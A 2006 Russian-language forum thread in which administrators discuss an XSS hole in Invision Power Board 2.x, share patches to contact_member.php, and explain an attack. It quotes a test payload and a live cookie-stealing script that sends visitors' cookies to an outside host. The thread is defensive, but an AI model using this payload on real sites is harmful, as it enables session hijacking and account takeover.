Skull Опубликовано 10 Марта 2006 Жалоба Поделиться Опубликовано 10 Марта 2006 http://www.security.nnov.ru/Ldocument661.html У меня на 2.1.4 со всеми багфиксами, alert без вопросов выскочил <script>alert()</script> Ссылка на комментарий Поделиться на других сайтах Прочее
0 sM1Le Опубликовано 10 Марта 2006 Жалоба Поделиться Опубликовано 10 Марта 2006 http://www.security.nnov.ru/Ldocument661.html У меня на 2.1.4 со всеми багфиксами, alert без вопросов выскочил <script>alert()</script>У нас уже пофиксено как дня 4 Ссылка на комментарий Поделиться на других сайтах Прочее
0 Skull Опубликовано 10 Марта 2006 Автор Жалоба Поделиться Опубликовано 10 Марта 2006 Ну это понятно, просто до не клиентов (потенциальных клиентов) тоже донести хотелось, так как сам случайно узнал. Ссылка на комментарий Поделиться на других сайтах Прочее
0 naka Опубликовано 10 Марта 2006 Жалоба Поделиться Опубликовано 10 Марта 2006 Пофиксел с недельку назад, блягодаря доброму человеку, с этого форума, который рассказал про дырку) Ссылка на комментарий Поделиться на других сайтах Прочее
0 ~* L O V E R *~ Опубликовано 10 Марта 2006 Жалоба Поделиться Опубликовано 10 Марта 2006 Ничего себе уязвимость, вот это дырка. Актуальна кстати похоже во всех версиях (на IPB 2.0.x работает).Уязвимость позволяет использовать любые html теги Лично я пофиксил, поставив чтобы жалоба отправлялась не на РП, а на мыло. У нас уже пофиксено как дня 4Вот интересно о скольких дырках в безопасности обычные пользователи так еще и не знают. Ссылка на комментарий Поделиться на других сайтах Прочее
0 naka Опубликовано 10 Марта 2006 Жалоба Поделиться Опубликовано 10 Марта 2006 Возможное исправление на 2.1.x (с)казал PALADIN В файле./sources/action_public/misc/contact_member.php найти Код$this->lib->msg_post = $this->email->message; заменить на Код$this->lib->msg_post = $this->ipsclass->clean_evil_tags($this->ipsclass->parse_clean_value($this->email->message)); Ссылка на комментарий Поделиться на других сайтах Прочее
0 xRay Опубликовано 11 Марта 2006 Жалоба Поделиться Опубликовано 11 Марта 2006 Ну а для 2.0.х тогда так будет в файле sources/misc/contact_member.php находим:$this->lib->msg_post = $this->email->message; заменяем на:$this->lib->msg_post = $std->clean_evil_tags($std->clean_value($this->email->message)); Ссылка на комментарий Поделиться на других сайтах Прочее
0 Fox Mulder Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 Спасибо за помощь. Пофиксили вроде!А кто-то может сказать что этот засланный скрипт сделал, а то я чота слабо понимаю? <script>img = new Image(); img.src = "http://s.netsec.ru/lol/pic.gif?"+document.cookie;</script> Ссылка на комментарий Поделиться на других сайтах Прочее
0 Raynor Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 Куки стырил, всех кто смотрел страницу с ним. Ссылка на комментарий Поделиться на других сайтах Прочее
0 naka Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 Эт снифер. Далее злоумышленик мог поставить себе твой ийли и хэш и мог зати под твои акаунтом. Ссылка на комментарий Поделиться на других сайтах Прочее
0 xRay Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 Уже не в первый раз убеждаюсь что береженого бог бережет Ребят защищиайте вход в админку еще и Апачем, в смысле что,s Апач пароль тряс на входе в админку пароль. В этом случае если и пролезут в базу через SQL-иньекцию то хрен им в админку им не попасть. Максимум это смогут похулиганить на самом форуме пользуясь админо-модерскими полномочиями. Сорьки вырвалось... Ссылка на комментарий Поделиться на других сайтах Прочее
0 Fox Mulder Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 Если форум стоит на хост-прове.. токак это сделать? Ссылка на комментарий Поделиться на других сайтах Прочее
0 Dekker Опубликовано 13 Марта 2006 Жалоба Поделиться Опубликовано 13 Марта 2006 все вопросы данной тематики обсуждаються Уязвимости форумов Invision Power Board Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
Skull
http://www.security.nnov.ru/Ldocument661.html
У меня на 2.1.4 со всеми багфиксами, alert без вопросов выскочил
<script>alert()</script>
Ссылка на комментарий
Поделиться на других сайтах
12 ответов на этот вопрос
Рекомендуемые сообщения